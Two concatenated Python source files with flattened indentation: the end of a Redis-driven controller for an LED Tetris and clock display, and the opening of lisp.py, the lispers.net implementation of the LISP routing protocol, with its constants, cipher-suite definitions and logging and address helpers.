from features.startscreen import Startscreen
from features.tetris import Tetris
running = True
def stophandler(signal, stackframe):
global running
print("Stop Tetris due to kill signal")
running = False
signal.signal(signal.SIGTERM, stophandler)
def control(features: dict, events: dict, subscriptions):
global active
global username
global running
while running:
sleep(0.1)
cmd = get_redis_message(subscriptions)
if cmd in features:
active.stop()
active = features[cmd]
active.start(username)
elif cmd == "start_highscore":
# TODO: implement highscore list display
test = highscorelist_tetris.highscores
print(test)
elif cmd in events:
active.event(events[cmd])
def get_redis_message(subscriptions) -> str:
global username
message = subscriptions.get_message()
if message:
command = message['data']
print(command)
if isinstance(command, (bytes, bytearray)):
command = str(command, "utf-8")
if str(message['channel'], "utf-8") == "username":
# TODO: global variable hack
username = command
return ""
print("Redis command received:", command)
return command
return ""
username = ""
redis_client = redis.StrictRedis(host='localhost', port=6379)
subscriptions = redis_client.pubsub()
subscriptions.subscribe('game_action')
subscriptions.subscribe("username")
field_leds = Field(10, 20)
field_matrix = Field(32, 8)
rgb_field_painter = RGB_Field_Painter()
led_matrix_painter = Led_Matrix_Painter()
highscorelist_tetris = Highscorelist("Tetris")
highscorelist_tetris.load()
highscorelist_snake = Highscorelist("Snake")
highscorelist_snake.load()
rainbowclock = Rainbowclock(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
clock = Clock(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
tetris = Tetris(field_leds, field_matrix, rgb_field_painter, led_matrix_painter, highscorelist_tetris)
snake = Snake_Main(field_leds, field_matrix, rgb_field_painter, led_matrix_painter, highscorelist_snake)
startscreen = Startscreen(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
snow = Snow(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
binary = BinaryClock(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
mona = Mona(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
features = {"start_tetris": tetris,
"tetris_start": tetris,
"start_clock_rainbow": rainbowclock,
"start_clock": clock,
"start_snake": snake,
"start_screen": startscreen,
"start_snow": snow,
"start_binary": binary}
events = {"action_new_block": "new",
"action_turn_left": "rotate left",
"action_turn_right": "rotate right",
"action_move_left": "move left",
"action_move_right": "move right",
"action_soft_down": "move down",
"action_hard_down": "move down",
"action_move_down": "move down",
"action_move_up": "move up",
"action_pause": "pause"}
active = mona
active.start("")
thread_for_control = threading.Thread(target=control, args=(features, events, subscriptions))
thread_for_control.daemon = True
thread_for_control.start()
while running:
active.tick()
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10 # In units of seconds
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed.
#
def lprint(*args):
if (lisp_debug_logging == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args: print arg,
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data):
if (len(data) < 20):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
